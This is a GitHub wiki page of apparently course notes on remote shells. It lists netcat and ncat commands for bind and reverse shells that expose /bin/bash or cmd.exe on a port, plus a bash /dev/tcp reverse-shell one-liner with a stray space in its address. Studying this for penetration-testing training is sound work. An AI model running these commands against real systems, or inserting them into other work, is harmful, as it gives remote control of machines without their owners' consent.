Remote Shells - Paiet/SEC-335 GitHub Wiki

Shells
- BIND vs Reverse shells
  - What's the difference?
- Using netcat to connect a shell
  - Set up a listener
    - nc -nlvp 9999
  - Connect to a listening service
    - nc -nv 10.1.1.2 9999
- Creating a BIND shell
  - LINUX nc -nlvp 9999 -e /bin/bash
  - WIN32 nc -nlvp 9999 -e cmd.exe
- Creating a Reverse shell
  - First: Set up a listener
  - Then client connects to listener "shoveling" a shell
    - LINUX nc -nv 10.1.1.2 9999 -e /bin/bash
    - WIN32 nc -nv 10.1.1.2 9999 -e cmd.exe
- Add security with ncat
  - Works much like nc
    - Even works WITH nc
    - BIND
      - Set up BIND listener
        
        ncat --exec cmd.exe -vnl 9999
      - connect to listener
        
        ncat -v 10.1.1.2 9999
    - REVERSE
      - Set up a listener
        
        ncat -v 9999
      - Client shovels shell to listener
        
        ncat --exec cmd.exe 10.1.1.1 9999
  - Able to "whitelist" connections
    - ncat --exec cmd.exe --allow 10.1.1.2 -vnl 9999
  - Able to encrypt sessions
    - ncat --exec cmd.exe --allow 10.1.1.2 -vnl 9999 -ssl
      - Doesn't work with nc if using encryption
  - BASH Reverse Shell
    - bash -i >& /dev/tcp/10.1.1.1 /9999 0>&1